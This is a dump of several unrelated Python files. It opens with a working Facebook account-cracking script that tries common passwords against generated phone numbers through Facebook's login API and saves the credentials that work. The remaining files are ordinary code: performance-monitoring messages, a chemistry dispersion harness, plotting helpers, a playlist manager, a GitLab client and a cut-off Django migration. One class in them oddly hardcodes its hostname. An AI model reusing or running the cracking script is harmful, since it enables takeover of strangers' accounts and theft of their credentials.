os.system("clear")
print (logo)
print "\033[1;91mENTER THE CODE HERE"
print "\033[1;94m011, 838, 428, 827"
print "\033[1;95m861, 862, 863, 503"
try:
c = raw_input(" SELECTED CODE: ")
k="+917"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="4":
os.system('xdg-open https://chat.whatsapp.com/JtCW38B01hjAGwlVHhyu5q')
print "\033[1;91mrun allsim by python2 S.py"
elif bch =="5":
os.system('xdg-open https://www.instagram.com/shubham_g0sai')
print "\033[1;91mrun allsim by python2 S.py"
elif bch =="6":
os.system("clear")
os.system("pip2 install --upgrade balln")
os.system("pip2 install --upgrade balln")
os.system("clear")
print(logo)
print
psb (" Tool has been successfully updated")
time.sleep(2)
os.system("python2 S.py")
# elif chb =='3':
# os.system('xdg-open https://www.facebook.com/100002059014174/posts/2677733205638620/?substory_index=0&app=fbl')
# time.sleep(1)
# menu()
elif bch =='0':
exb()
else:
print '[!] Fill in correctly'
action()
xxx = str(len(id))
psb ('[✓] Total Numbers: '+xxx)
time.sleep(0.5)
psb ('[✓] Please wait, process is running ...')
time.sleep(0.5)
psb ('[!] (for Exit) Press CTRL Then Press z')
time.sleep(0.5)
print 50*'-'
print
def main(arg):
global cpb,oks
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = user
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91mBLACK-KILLER-HACKED\x1b[1;97m-\x1b[1;94m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass1
okb = open('save/successfull.txt', 'a')
okb.write(k+c+user+'|'+pass1+'\n')
okb.close()
oks.append(c+user+pass1)
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;92mAFTER(3DAYS)🗝\x1b[1;95m-\x1b[1;93m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass1
cps = open('save/checkpoint.txt', 'a')
cps.write(k+c+user+'|'+pass1+'\n')
cps.close()
cpb.append(c+user+pass1)
else:
pass2 = '786786'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91mBLACK-KILLER-HACKED√\x1b[1;97m-\x1b[1;94m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass2
okb = open('save/successfull.txt', 'a')
okb.write(k+c+user+'|'+pass2+'\n')
okb.close()
oks.append(c+user+pass2)
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;92mAFTER(3DAYS)🗝\x1b[1;95m-\x1b[1;93m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass2
cps = open('save/checkpoint.txt', 'a')
cps.write(k+c+user+'|'+pass2+'\n')
cps.close()
cpb.append(c+user+pass2)
else:
pass3 = k + user
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91mBLACK-KILLER-HACKED√\x1b[1;97m-\x1b[1;94m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass3
okb = open('save/successfull.txt', 'a')
okb.write(k+c+user+'|'+pass3+'\n')
okb.close()
oks.append(c+user+pass3)
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;92mAFTER(3DAYS)🗝\x1b[1;95m-\x1b[1;93m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass3
cps = open('save/checkpoint.txt', 'a')
cps.write(k+c+user+'|'+pass3+'\n')
cps.close()
cpb.append(c+user+pass3)
else:
pass4 = 'india123'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91mBLACK-KILLER-HACKED√\x1b[1;97m-\x1b[1;94m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass4
okb = open('save/successfull.txt', 'a')
okb.write(k+c+user+'|'+pass4+'\n')
okb.close()
oks.append(c+user+pass4)
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;92mAFTER(3DAYS)🗝\x1b[1;95m-\x1b[1;93m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass4
cps = open('save/checkpoint.txt', 'a')
cps.write(k+c+user+'|'+pass4+'\n')
cps.close()
cpb.append(c+user+pass4)
else:
pass4 = 'india1234'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91mBLACK-KILLER-HACKED√\x1b[1;97m-\x1b[1;94m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass4
okb = open('save/successfull.txt', 'a')
okb.write(k+c+user+'|'+pass4+'\n')
okb.close()
oks.append(c+user+pass4)
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;92mAFTER(3DAYS)🗝\x1b[1;95m-\x1b[1;93m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass4
cps = open('save/checkpoint.txt', 'a')
cps.write(k+c+user+'|'+pass4+'\n')
cps.close()
cpb.append(c+user+pass4)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 50*'-'
print '[✓] Process Has Been Completed ....'
print '[✓] Total OK/CP : '+str(len(oks))+'/'+str(len(cpb))
print('[✓] CP File Has Been Saved : save/checkpoint.txt')
raw_input('\n[Press Enter To Go Back]')
os.system('python2 S.py')
if __name__ == '__main__':
menu()
| python |
# coding=utf-8
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import re
from scout_apm.compat import iteritems
logger = logging.getLogger(__name__)
key_regex = re.compile(r"^[a-zA-Z0-9]{20}$")
class Register(object):
__slots__ = ("app", "key", "hostname")
def __init__(self, app, key, hostname):
self.app = app
self.key = key
self.hostname = "force_set_hostname"
def message(self):
key_prefix = self.key[:3]
key_matches_regex = bool(key_regex.match(self.key))
logger.info(
"Registering with app=%s key_prefix=%s key_format_validated=%s host=%s"
% (self.app, key_prefix, key_matches_regex, self.hostname)
)
return {
"Register": {
"app": self.app,
"key": self.key,
"host": self.hostname,
"language": "python",
"api_version": "1.0",
}
}
class StartSpan(object):
__slots__ = ("timestamp", "request_id", "span_id", "parent", "operation")
def __init__(self, timestamp, request_id, span_id, parent, operation):
self.timestamp = timestamp
self.request_id = request_id
self.span_id = span_id
self.parent = parent
self.operation = operation
def message(self):
return {
"StartSpan": {
"timestamp": self.timestamp.isoformat() + "Z",
"request_id": self.request_id,
"span_id": self.span_id,
"parent_id": self.parent,
"operation": self.operation,
}
}
class StopSpan(object):
__slots__ = ("timestamp", "request_id", "span_id")
def __init__(self, timestamp, request_id, span_id):
self.timestamp = timestamp
self.request_id = request_id
self.span_id = span_id
def message(self):
return {
"StopSpan": {
"timestamp": self.timestamp.isoformat() + "Z",
"request_id": self.request_id,
"span_id": self.span_id,
}
}
class StartRequest(object):
__slots__ = ("timestamp", "request_id")
def __init__(self, timestamp, request_id):
self.timestamp = timestamp
self.request_id = request_id
def message(self):
return {
"StartRequest": {
"timestamp": self.timestamp.isoformat() + "Z",
"request_id": self.request_id,
}
}
class FinishRequest(object):
__slots__ = ("timestamp", "request_id")
def __init__(self, timestamp, request_id):
self.timestamp = timestamp
self.request_id = request_id
def message(self):
return {
"FinishRequest": {
"timestamp": self.timestamp.isoformat() + "Z",
"request_id": self.request_id,
}
}
class TagSpan(object):
__slots__ = ("timestamp", "request_id", "span_id", "tag", "value")
def __init__(self, timestamp, request_id, span_id, tag, value):
self.timestamp = timestamp
self.request_id = request_id
self.span_id = span_id
self.tag = tag
self.value = value
def message(self):
return {
"TagSpan": {
"timestamp": self.timestamp.isoformat() + "Z",
"request_id": self.request_id,
"span_id": self.span_id,
"tag": self.tag,
"value": self.value,
}
}
class TagRequest(object):
__slots__ = ("timestamp", "request_id", "tag", "value")
def __init__(self, timestamp, request_id, tag, value):
self.timestamp = timestamp
self.request_id = request_id
self.tag = tag
self.value = value
def message(self):
return {
"TagRequest": {
"timestamp": self.timestamp.isoformat() + "Z",
"request_id": self.request_id,
"tag": self.tag,
"value": self.value,
}
}
class ApplicationEvent(object):
__slots__ = ("event_type", "event_value", "source", "timestamp")
def __init__(self, event_type, event_value, source, timestamp):
self.event_type = event_type
self.event_value = event_value
self.source = source
self.timestamp = timestamp
def message(self):
return {
"ApplicationEvent": {
"timestamp": self.timestamp.isoformat() + "Z",
"event_type": self.event_type,
"event_value": self.event_value,
"source": self.source,
}
}
class BatchCommand(object):
__slots__ = ("commands",)
def __init__(self, commands):
self.commands = commands
def message(self):
return {
"BatchCommand": {
"commands": [command.message() for command in self.commands]
}
}
@classmethod
def from_tracked_request(cls, request):
# The TrackedRequest must be finished
commands = []
commands.append(
StartRequest(timestamp=request.start_time, request_id=request.request_id)
)
for key, value in iteritems(request.tags):
commands.append(
TagRequest(
timestamp=request.start_time,
request_id=request.request_id,
tag=key,
value=value,
)
)
for span in request.complete_spans:
commands.append(
StartSpan(
timestamp=span.start_time,
request_id=span.request_id,
span_id=span.span_id,
parent=span.parent,
operation=span.operation,
)
)
for key, value in iteritems(span.tags):
commands.append(
TagSpan(
timestamp=span.start_time,
request_id=request.request_id,
span_id=span.span_id,
tag=key,
value=value,
)
)
commands.append(
StopSpan(
timestamp=span.end_time,
request_id=span.request_id,
span_id=span.span_id,
)
)
commands.append(
FinishRequest(timestamp=request.end_time, request_id=request.request_id)
)
return cls(commands)
| python |
"""Compute dispersion correction using Greenwell & Beran's MP2D executable."""
import pprint
import re
import sys
from decimal import Decimal
from typing import Any, Dict, Optional, Tuple
import numpy as np
import qcelemental as qcel
from qcelemental.models import AtomicResult, Provenance
from qcelemental.util import safe_version, which
from ..exceptions import InputError, ResourceError, UnknownError
from ..util import execute
from . import empirical_dispersion_resources
from .model import ProgramHarness
pp = pprint.PrettyPrinter(width=120, compact=True, indent=1)
class MP2DHarness(ProgramHarness):
_defaults = {
"name": "MP2D",
"scratch": True,
"thread_safe": True,
"thread_parallel": False,
"node_parallel": False,
"managed_memory": False,
}
version_cache: Dict[str, str] = {}
class Config(ProgramHarness.Config):
pass
@staticmethod
def found(raise_error: bool = False) -> bool:
return which(
"mp2d",
return_bool=True,
raise_error=raise_error,
raise_msg="Please install via `conda install mp2d -c psi4`",
)
def get_version(self) -> str:
self.found(raise_error=True)
which_prog = which("mp2d")
if which_prog not in self.version_cache:
# Note: anything below v1.1 will return an input error message here. but that's fine as version compare evals to False.
command = [which_prog, "--version"]
import subprocess
proc = subprocess.run(command, stdout=subprocess.PIPE)
self.version_cache[which_prog] = safe_version(proc.stdout.decode("utf-8").strip())
return self.version_cache[which_prog]
def compute(self, input_model: "AtomicInput", config: "TaskConfig") -> "AtomicResult":
from ..testing import is_program_new_enough
self.found(raise_error=True)
if not is_program_new_enough("mp2d", "1.1"):
raise ResourceError(f"MP2D version '{self.get_version()}' too old. Please update to at least '1.1'.")
job_inputs = self.build_input(input_model, config)
success, dexe = self.execute(job_inputs)
if success:
dexe["outfiles"]["stdout"] = dexe["stdout"]
dexe["outfiles"]["stderr"] = dexe["stderr"]
output_model = self.parse_output(dexe["outfiles"], input_model)
else:
output_model = input_model
output_model["error"] = {"error_type": "execution_error", "error_message": dexe["stderr"]}
return output_model
def execute(
self, inputs: Dict[str, Any], *, extra_outfiles=None, extra_commands=None, scratch_name=None, timeout=None
) -> Tuple[bool, Dict]:
success, dexe = execute(
inputs["command"],
inputs["infiles"],
inputs["outfiles"],
scratch_messy=False,
scratch_directory=inputs["scratch_directory"],
)
return success, dexe
def build_input(
self, input_model: "AtomicInput", config: "TaskConfig", template: Optional[str] = None
) -> Dict[str, Any]:
# strip engine hint
mtd = input_model.model.method
if mtd.startswith("mp2d-"):
mtd = mtd[5:]
if input_model.driver.derivative_int() > 1:
raise InputError(f"Driver {input_model.driver} not implemented for MP2D.")
# temp until actual options object
input_model.extras["info"] = empirical_dispersion_resources.from_arrays(
name_hint=mtd,
level_hint=input_model.keywords.get("level_hint", None),
param_tweaks=input_model.keywords.get("params_tweaks", None),
dashcoeff_supplement=input_model.keywords.get("dashcoeff_supplement", None),
)
# Need 'real' field later and that's only guaranteed for molrec
molrec = qcel.molparse.from_schema(input_model.molecule.dict())
xyz = qcel.molparse.to_string(molrec, dtype="xyz", units="Angstrom", ghost_format="")
infiles = {"mp2d_geometry": xyz}
# jobrec['molecule']['real'] = molrec['real']
# env = {
# 'HOME': os.environ.get('HOME'),
# 'PATH': os.environ.get('PATH'),
# #'PATH': os.pathsep.join([os.path.abspath(x) for x in os.environ.get('PSIPATH', '').split(os.pathsep) if x != '']) + \
# # os.pathsep + os.environ.get('PATH'),
# #'LD_LIBRARY_PATH': os.environ.get('LD_LIBRARY_PATH'),
# }
command = ["mp2d", "mp2d_geometry"]
command.extend(
"""--TT_a1={a1} --TT_a2={a2} --rcut={rcut} --w={w} --s8={s8}""".format(
**input_model.extras["info"]["dashparams"]
).split()
)
if input_model.driver == "gradient":
command.append("--gradient")
return {
"command": command,
"infiles": infiles,
"outfiles": ["mp2d_gradient"],
"scratch_directory": config.scratch_directory,
"input_result": input_model.copy(deep=True),
}
def parse_output(self, outfiles: Dict[str, str], input_model: "AtomicInput") -> "AtomicResult":
stdout = outfiles.pop("stdout")
for fl, contents in outfiles.items():
if contents is not None:
# LOG text += f'\n MP2D scratch file {fl} has been read.\n'
pass
# parse energy output (could go further and break into UCHF, CKS)
real = np.array(input_model.molecule.real)
full_nat = real.shape[0]
real_nat = np.sum(real)
for ln in stdout.splitlines():
if re.match(" MP2D dispersion correction Eh", ln):
ene = Decimal(ln.split()[4])
elif re.match("Atomic Coordinates in Angstroms", ln):
break
else:
if not ((real_nat == 1) and (input_model.driver == "gradient")):
raise UnknownError("Unknown issue occured.")
# parse gradient output
if outfiles["mp2d_gradient"] is not None:
srealgrad = outfiles["mp2d_gradient"]
realgrad = np.fromstring(srealgrad, count=3 * real_nat, sep=" ").reshape((-1, 3))
if input_model.driver == "gradient":
ireal = np.argwhere(real).reshape((-1))
fullgrad = np.zeros((full_nat, 3))
try:
fullgrad[ireal, :] = realgrad
except NameError as exc:
raise UnknownError("Unsuccessful gradient collection.") from exc
qcvkey = input_model.extras["info"]["fctldash"].upper()
calcinfo = []
calcinfo.append(qcel.Datum("CURRENT ENERGY", "Eh", ene))
calcinfo.append(qcel.Datum("DISPERSION CORRECTION ENERGY", "Eh", ene))
calcinfo.append(qcel.Datum("2-BODY DISPERSION CORRECTION ENERGY", "Eh", ene))
if qcvkey:
calcinfo.append(qcel.Datum(f"{qcvkey} DISPERSION CORRECTION ENERGY", "Eh", ene))
if input_model.driver == "gradient":
calcinfo.append(qcel.Datum("CURRENT GRADIENT", "Eh/a0", fullgrad))
calcinfo.append(qcel.Datum("DISPERSION CORRECTION GRADIENT", "Eh/a0", fullgrad))
calcinfo.append(qcel.Datum("2-BODY DISPERSION CORRECTION GRADIENT", "Eh/a0", fullgrad))
if qcvkey:
calcinfo.append(qcel.Datum(f"{qcvkey} DISPERSION CORRECTION GRADIENT", "Eh/a0", fullgrad))
# LOGtext += qcel.datum.print_variables({info.label: info for info in calcinfo})
calcinfo = {info.label: info.data for info in calcinfo}
# calcinfo = qcel.util.unnp(calcinfo, flat=True)
# got to even out who needs plump/flat/Decimal/float/ndarray/list
# Decimal --> str preserves precision
calcinfo = {
k.upper(): str(v) if isinstance(v, Decimal) else v for k, v in qcel.util.unnp(calcinfo, flat=True).items()
}
# jobrec['properties'] = {"return_energy": ene}
# jobrec["molecule"]["real"] = list(jobrec["molecule"]["real"])
retres = calcinfo[f"CURRENT {input_model.driver.upper()}"]
if isinstance(retres, Decimal):
retres = float(retres)
elif isinstance(retres, np.ndarray):
retres = retres.ravel().tolist()
output_data = {
"extras": input_model.extras,
"properties": {},
"provenance": Provenance(
creator="MP2D", version=self.get_version(), routine=__name__ + "." + sys._getframe().f_code.co_name
),
"return_result": retres,
"stdout": stdout,
}
output_data["extras"]["local_keywords"] = input_model.extras["info"]
output_data["extras"]["qcvars"] = calcinfo
output_data["success"] = True
return AtomicResult(**{**input_model.dict(), **output_data})
| python |
__all__ = ["partitionN"]
from partition import *
| python |
# yellowbrick.utils.helpers
# Helper functions and generic utilities for use in Yellowbrick code.
#
# Author: Benjamin Bengfort <[email protected]>
# Created: Fri May 19 10:39:30 2017 -0700
#
# Copyright (C) 2017 District Data Labs
# For license information, see LICENSE.txt
#
# ID: helpers.py [79cd8cf] [email protected] $
"""
Helper functions and generic utilities for use in Yellowbrick code.
"""
##########################################################################
## Imports
##########################################################################
from __future__ import division
import re
import numpy as np
from sklearn.pipeline import Pipeline
from .types import is_estimator
from yellowbrick.exceptions import YellowbrickTypeError
##########################################################################
## Model and Feature Information
##########################################################################
def get_model_name(model):
"""
Detects the model name for a Scikit-Learn model or pipeline.
Parameters
----------
model: class or instance
The object to determine the name for. If the model is an estimator it
returns the class name; if it is a Pipeline it returns the class name
of the final transformer or estimator in the Pipeline.
Returns
-------
name : string
The name of the model or pipeline.
"""
if not is_estimator(model):
raise YellowbrickTypeError(
"Cannot detect the model name for non estimator: '{}'".format(
type(model)
)
)
else:
if isinstance(model, Pipeline):
return get_model_name(model.steps[-1][-1])
else:
return model.__class__.__name__
def has_ndarray_int_columns(features, X):
""" Checks if numeric feature columns exist in ndarray """
_, ncols = X.shape
if not all(d.isdigit() for d in features if isinstance(d, str)) or not isinstance(X, np.ndarray):
return False
ndarray_columns = np.arange(0, ncols)
feature_cols = np.unique([int(d) for d in features])
return all(np.in1d(feature_cols, ndarray_columns))
# Alias for closer name to isinstance and issubclass
hasndarrayintcolumns = has_ndarray_int_columns
def is_monotonic(a, increasing=True):
"""
Tests whether a vector a has monotonicity.
Parameters
----------
a : array-like
Array that should be tested for monotonicity
increasing : bool, default: True
Test if the array is montonically increasing, otherwise test if the
array is montonically decreasing.
"""
a = np.asarray(a) # ensure a is array-like
if a.ndim > 1:
raise ValueError("not supported for multi-dimensonal arrays")
if len(a) <= 1:
return True
if increasing:
return np.all(a[1:] >= a[:-1], axis=0)
return np.all(a[1:] <= a[:-1], axis=0)
##########################################################################
## Numeric Computations
##########################################################################
#From here: http://stackoverflow.com/questions/26248654/numpy-return-0-with-divide-by-zero
def div_safe( numerator, denominator ):
"""
Ufunc-extension that returns 0 instead of nan when dividing numpy arrays
Parameters
----------
numerator: array-like
denominator: scalar or array-like that can be validly divided by the numerator
returns a numpy array
example: div_safe( [-1, 0, 1], 0 ) == [0, 0, 0]
"""
#First handle scalars
if np.isscalar(numerator):
raise ValueError("div_safe should only be used with an array-like numerator")
#Then numpy arrays
try:
with np.errstate(divide='ignore', invalid='ignore'):
result = np.true_divide( numerator, denominator )
result[ ~ np.isfinite( result )] = 0 # -inf inf NaN
return result
except ValueError as e:
raise e
def prop_to_size(vals, mi=0.0, ma=5.0, power=0.5, log=False):
"""
Converts an array of property values (e.g. a metric or score) to values
that are more useful for marker sizes, line widths, or other visual
sizes. The new sizes are computed as:
y = mi + (ma -mi)(\frac{x_i - min(x){max(x) - min(x)})^{power}
If ``log=True``, the natural logarithm of the property values is used instead.
Parameters
----------
prop : array-like, 1D
An array of values of the property to scale between the size range.
mi : float, default: 0.0
The size to assign the smallest property (minimum size value).
ma : float, default: 5.0
The size to assign the largest property (maximum size value).
power : float, default: 0.5
Used to control how rapidly the size increases from smallest to largest.
log : bool, default: False
Use the natural logarithm to compute the property sizes
Returns
-------
sizes : array, 1D
The new size values, in the same shape as the input prop array
"""
# ensure that prop is an array
vals = np.asarray(vals)
# apply natural log if specified
if log:
vals = np.log(vals)
# avoid division by zero error
delta = vals.max() - vals.min()
if delta == 0.0:
delta = 1.0
return mi + (ma-mi) * ((vals -vals.min()) / delta) ** power
##########################################################################
## String Computations
##########################################################################
def slugify(text):
"""
Returns a slug of given text, normalizing unicode data for file-safe
strings. Used for deciding where to write images to disk.
Parameters
----------
text : string
The string to slugify
Returns
-------
slug : string
A normalized slug representation of the text
.. seealso:: http://yashchandra.com/2014/05/08/how-to-generate-clean-url-or-a-slug-in-python/
"""
slug = re.sub(r'[^\w]+', ' ', text)
slug = "-".join(slug.lower().strip().split())
return slug
| python |
import os
import random
class Playlist:
# maintains individual playlist
def __init__(self, path):
self.path = path
self.clips = []
n = os.path.basename(self.path).split(".")[:-1]
self.name = ".".join(n)
self.desc = ""
def load(self):
# each line has the format: "card_no, clip_name"
# line starting with a hash (#) is part of the description
with open(self.path) as pl:
for line in pl:
line = line.strip()
if line.startswith("#"):
self.desc += line.strip('#')
continue
if line == "":
continue
if "," in line:
line = line.split(",")
idx = line[0].strip()
cl = line[1].strip()
self.clips.append((idx, cl))
else:
print("Unknown line format in {}".format(self.path))
def delete(self):
os.remove(self.path)
def rename(self, name):
new = os.path.join(os.path.dirname(self.path), name)
os.rename(self.path, new)
self.path = new
n = name.split(".")[:-1]
self.name = ".".join(n)
def save(self):
with open(self.path, 'w+') as pl:
desc = self.desc.replace("\n", "\n#")
pl.write("#{}\n\n".format(desc))
for item in self.clips:
idx, cl = item
pl.write("{}, {}\n".format(idx, cl))
def addClip(self, idx, clip):
self.clips.append((idx, clip))
def removeClipAt(self, idx):
# remove clip at the specified position of the clip list
del self.clips[idx-1]
def removeClip(self, cardid, clipname):
# remove clip using card no and clip name
try:
idx = self.clips.index((cardid, clipname))
except ValueError:
# this shouldn't happen, perhaps we should
# raise a warning?
return
else: del self.clips[idx]
def shuffle(self):
random.shuffle(self.clips)
class PlaylistContainer:
# maintains all the playlists
def __init__(self, directory=None):
self.listdir = directory
self.playlist_extension = ".pl"
self.lists = []
def load(self, directory=None):
if directory:
self.listdir = directory
if self.listdir is None:
raise ValueError("Playlist directory is not set.")
if not os.path.isdir(self.listdir):
os.mkdir(self.listdir)
for f in os.listdir(self.listdir):
if f.endswith(self.playlist_extension):
hnd = Playlist(os.path.join(self.listdir, f))
hnd.load()
self.lists.append(hnd)
def getIdByName(self, name):
for i, l in enumerate(self.lists):
if name == l.name:
return i
return None
def getIdByPath(self, path):
for i, l in enumerate(self.lists):
if path == l.path:
return i
return None
def create(self, name):
if not name.endswith(self.playlist_extension):
name += self.playlist_extension
hnd = Playlist(os.path.join(self.listdir, name))
hnd.save()
self.lists.append(hnd)
return hnd
def rename(self, playlistid, name):
if not name.endswith(self.playlist_extension):
name += self.playlist_extension
self.lists[playlistid].rename(name)
def addClip(self, playlistid, cardid, clipname):
self.lists[playlistid].addClip(cardid, clipname)
def name(self, playlistid):
return self.lists[playlistid].name
def getDesc(self, playlistid):
return self.lists[playlistid].desc
def setDesc(self, playlistid, d):
self.lists[playlistid].desc = d
self.lists[playlistid].save()
def clips(self, playlistid):
return self.lists[playlistid].clips
def save(self, playlistid=None):
# if no playlist id is given, save all
if playlistid is None:
for l in self.lists:
l.save()
else:
self.lists[playlistid].save()
def removeClip(self, playlistid, cardid, name):
self.lists[playlistid].removeClip(cardid, name)
self.save(playlistid)
def remove(self, playlistid):
self.lists[playlistid].delete()
del self.lists[playlistid]
def count(self, playlistid=None):
# if playlist id is given, return clips count of it
# if no playlist id is given, return playlists count
if playlistid is None:
return len(self.lists)
else:
return len(self.lists[playlistid].clips)
def updateOrder(self, playlistid, newlist):
# sanity check
if len(newlist) != self.count(playlistid):
print("Playlist UO: length mismatch.")
return False
for newitem in newlist:
if newitem not in self.lists[playlistid].clips:
print("Playlist UO: {} not in {}".format(newitem, self.name(playlistid)))
return False
self.lists[playlistid].clips = newlist
self.save(playlistid)
return True
| python |
# -*- coding: utf-8 -*-
# Copyright (C) SME Virtual Network contributors. All rights reserved.
# See LICENSE in the project root for license information.
| python |
# -*- coding: utf-8 -*-
"""
Created on Fri Nov 6 14:07:32 2020
"""
from netCDF4 import Dataset
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap
data = Dataset(r"C:\Users\Jiacheng Li\Desktop\Study\University of Birmingham Relevant\Final Year Project\NetCDF_Handling\NetCDF_data\1980.nc", "r")
lats = data.variables["lat"][:]
lons = data.variables["lon"][:]
time = data.variables["time"][:]
tave = data.variables["tave"][:]
mp = Basemap(projection = "merc",
llcrnrlon = 65.8,
llcrnrlat = -2,
urcrnrlon = 145.37,
urcrnrlat = 38.78,
resolution = "i")
lon, lat = np.meshgrid(lons, lats)
x, y = mp(lon, lat)
colorMap = mp.pcolor(x, y, np.squeeze(tave[0,:,:]), cmap = "rainbow")
mp.drawcoastlines()
mp.drawstates()
mp.drawcountries()
char = mp.colorbar(colorMap, location = "right", pad = "10%")
plt.title("Average Temparature on 01-01-1980")
plt.show()
| python |
from __future__ import absolute_import
from requests.exceptions import HTTPError
from six.moves.urllib.parse import quote
from sentry.http import build_session
from sentry_plugins.exceptions import ApiError
class GitLabClient(object):
def __init__(self, url, token):
self.url = url
self.token = token
def request(self, method, path, data=None, params=None):
headers = {
'Private-Token': self.token,
}
session = build_session()
try:
resp = getattr(session, method.lower())(
url='{}/api/v3/{}'.format(self.url, path.lstrip('/')),
headers=headers,
json=data,
params=params,
allow_redirects=False,
)
resp.raise_for_status()
except HTTPError as e:
raise ApiError.from_response(e.response)
return resp.json()
def auth(self):
return self.request('GET', '/user')
def get_project(self, repo):
return self.request('GET', '/projects/{}'.format(quote(repo, safe='')))
def get_issue(self, repo, issue_id):
try:
return self.request(
'GET',
'/projects/{}/issues'.format(
quote(repo, safe=''),
),
params={
# XXX(dcramer): this is an undocumented API
'iid': issue_id,
}
)[0]
except IndexError:
raise ApiError('Issue not found with ID', 404)
def create_issue(self, repo, data):
return self.request(
'POST',
'/projects/{}/issues'.format(quote(repo, safe='')),
data=data,
)
def create_note(self, repo, global_issue_id, data):
return self.request(
'POST',
'/projects/{}/issues/{}/notes'.format(
quote(repo, safe=''),
global_issue_id,
),
data=data,
)
def list_project_members(self, repo):
return self.request(
'GET',
'/projects/{}/members'.format(quote(repo, safe='')),
)
| python |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-05-06 04:34
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
replaces = [(b'coding', '0001_initial'), (b'coding', '0002_auto_20160506_0424'), (b'coding', '0003_auto_20160506_0427')]
initial = True
dependencies = [
('main', '0001_squashed_0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Assignment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateTimeField(auto_now_add=True, null=True)),
('modified_date', models.DateTimeField(auto_now=True, null=True)),
('deleted_date', models.DateTimeField(blank=True, null=True)),
('name', models.CharField(max_length=64)),
('description', models.TextField(blank=True, null=True)),
('assigned_comments', models.ManyToManyField(blank=True, to=b'main.Comment')),
('assigned_submissions', models.ManyToManyField(blank=True, to=b'main.Submission')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Code',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateTimeField(auto_now_add=True, null=True)),
('modified_date', models.DateTimeField(auto_now=True, null=True)),
('deleted_date', models.DateTimeField(blank=True, null=True)),
('name', models.CharField(max_length=64)),
('description', models.TextField(blank=True, null=True)),
('css_class', models.CharField(blank=True, max_length=64, null=True)),
('key', models.CharField(blank=True, max_length=1, null=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='code_created_by', to=settings.AUTH_USER_MODEL)),
('deleted_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='code_deleted_by', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='code_modified_by', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='CodeScheme',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateTimeField(auto_now_add=True, null=True)),
('modified_date', models.DateTimeField(auto_now=True, null=True)),
('deleted_date', models.DateTimeField(blank=True, null=True)),
('name', models.CharField(max_length=64)),
('description', models.TextField()),
('mutually_exclusive', models.BooleanField(default=False)),
